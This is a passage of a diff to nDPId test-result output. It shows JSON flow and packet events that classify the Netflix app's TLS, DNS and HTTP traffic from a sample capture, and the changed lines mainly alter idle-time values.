{"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01398{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6777,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319117605,"flow_last_seen":1484319117738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3413,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1484319117738,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} +01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6789,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117651,"flow_last_seen":1484319117770,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319117770,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6790,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319117651,"flow_last_seen":1484319117771,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319117771,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6799,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117826,"flow_last_seen":1484319117826,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117826,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6799,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1484319117826,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117826,"pkt":"gCqoTGHM5JjWH70UCABFAABAF8hAAEAGDxPAqAEHNCkeBdABAbshc+whAAAAALAC\/\/8t3QAAAgQFtAEDAwUBAQgKH2X2iwAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117827,"flow_last_seen":1484319117827,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117827,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1484319117827,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117827,"pkt":"gCqoTGHM5JjWH70UCABFAABADR1AAEAGGb7AqAEHNCkeBdACAbuRqNIFAAAAALAC\/\/\/XwQAAAgQFtAEDAwUBAQgKH2X2jAAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6809,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1484319117879,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117879,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGPL80KR4FwKgBBwG70AFaPMiyIXPsIqASOJC25AAAAgQFtAQCCAqh\/YpsH2X2iwEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6810,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1484319117881,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117881,"pkt":"gCqoTGHM5JjWH70UCABFAAA0BiRAAEAGIMPAqAEHNCkeBdABAbshc+wiWjzIs4AQEBUN+QAAAQEICh9l9r+h\/Yps"} +00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6811,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117826,"flow_last_seen":1484319117885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319117885,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6812,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1484319117886,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117886,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGPb80KR4FwKgBBwG70ALhlhIJkajSBqASOJCQFwAAAgQFtAQCCAqh\/YptH2X2jAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6813,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1484319117890,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117890,"pkt":"gCqoTGHM5JjWH70UCABFAAA0Pr9AAEAG6CfAqAEHNCkeBdACAbuRqNIG4ZYSCoAQEBXnJgAAAQEICh9l9sWh\/Ypt"} +00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6814,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117827,"flow_last_seen":1484319117892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319117892,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6821,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117826,"flow_last_seen":1484319117930,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319117930,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6828,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117827,"flow_last_seen":1484319117942,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319117942,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6888,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118629,"flow_last_seen":1484319118629,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1484319118629,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6888,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1484319118629,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1484319118629,"pkt":"gCqoTGHM5JjWH70UCABFAABDkmsAAP8RpeXAqAEHwKgBAd8FADUALzVHkfABAAABAAAAAAAABWExOTA3BGRzY2cGYWthbWFpA25ldAAAAQAB"} 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6888,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118629,"flow_last_seen":1484319118629,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1484319118629,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a1907.dscg.akamai.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1484319118652,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1484319118652,"pkt":"5JjWH70UgCqoTGHMCABFAABj4U1AAEAR1ePAqAEBwKgBBwA13wUATx78kfCBgAABAAIAAAAABWExOTA3BGRzY2cGYWthbWFpA25ldAAAAQABwAwAAQABAAAADAAEuBnMCsAMAAEAAQAAAAwABLgZzBk="} 00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319118629,"flow_last_seen":1484319118652,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319118652,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a1907.dscg.akamai.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.10"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6898,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118657,"flow_last_seen":1484319118657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319118657,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6898,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1484319118657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319118657,"pkt":"gCqoTGHM5JjWH70UCABFAABAL91AAEAGxQfAqAEHuBnMCtADAFAmSxL9AAAAALAC\/\/\/OdwAAAgQFtAEDAwUBAQgKH2X5sAAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6899,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118658,"flow_last_seen":1484319118658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319118658,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6899,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1484319118658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319118658,"pkt":"gCqoTGHM5JjWH70UCABFAABAEThAAEAG46zAqAEHuBnMCtAEAFDFgkYhAAAAALAC\/\/\/8GgAAAgQFtAEDAwUBAQgKH2X5sAAAAAAEAgAA"} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6901,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1484319118672,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319118672,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Mi4GcwKwKgBBwBQ0APyPQT8JksS\/qAScSAMhgAAAgQFtAQCCAr\/\/WqNH2X5sAEDAwU="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6902,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1484319118674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319118674,"pkt":"gCqoTGHM5JjWH70UCABFAAA0XA9AAEAGmOHAqAEHuBnMCtADAFAmSxL+8j0E\/YAQEBWcSwAAAQEICh9l+cD\/\/WqN"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6903,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1484319118674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319118674,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Mi4GcwKwKgBBwBQ0ASr4P0LxYJGIqAScSCIdgAAAgQFtAQCCAr\/\/WqNH2X5sAEDAwU="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6905,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1484319118675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319118675,"pkt":"gCqoTGHM5JjWH70UCABFAAA0us1AAEAGOiPAqAEHuBnMCtAEAFDFgkYiq+D9DIAQEBUYOwAAAQEICh9l+cH\/\/WqN"} -00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6906,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319118657,"flow_last_seen":1484319118676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319118676,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-1.nflximg.net","url":"art-1.nflximg.net\/4e36d\/6289889020d6cc6dfb3038c35564a41e1ca4e36d.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} -00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6908,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319118658,"flow_last_seen":1484319118687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319118687,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-1.nflximg.net","url":"art-1.nflximg.net\/8b1fa\/eaa1b78cd72ca4dbdcab527691d2fcab37c8b1fa.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":230,"flow_first_seen":1484319036854,"flow_last_seen":1484319110632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":194464,"flow_avg_l4_payload_len":845,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6898,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118657,"flow_last_seen":1484319118657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319118657,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6898,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1484319118657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319118657,"pkt":"gCqoTGHM5JjWH70UCABFAABAL91AAEAGxQfAqAEHuBnMCtADAFAmSxL9AAAAALAC\/\/\/OdwAAAgQFtAEDAwUBAQgKH2X5sAAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6899,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118658,"flow_last_seen":1484319118658,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319118658,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6899,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1484319118658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319118658,"pkt":"gCqoTGHM5JjWH70UCABFAABAEThAAEAG46zAqAEHuBnMCtAEAFDFgkYhAAAAALAC\/\/\/8GgAAAgQFtAEDAwUBAQgKH2X5sAAAAAAEAgAA"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6901,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1484319118672,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319118672,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Mi4GcwKwKgBBwBQ0APyPQT8JksS\/qAScSAMhgAAAgQFtAQCCAr\/\/WqNH2X5sAEDAwU="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6902,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1484319118674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319118674,"pkt":"gCqoTGHM5JjWH70UCABFAAA0XA9AAEAGmOHAqAEHuBnMCtADAFAmSxL+8j0E\/YAQEBWcSwAAAQEICh9l+cD\/\/WqN"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6903,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1484319118674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319118674,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Mi4GcwKwKgBBwBQ0ASr4P0LxYJGIqAScSCIdgAAAgQFtAQCCAr\/\/WqNH2X5sAEDAwU="} 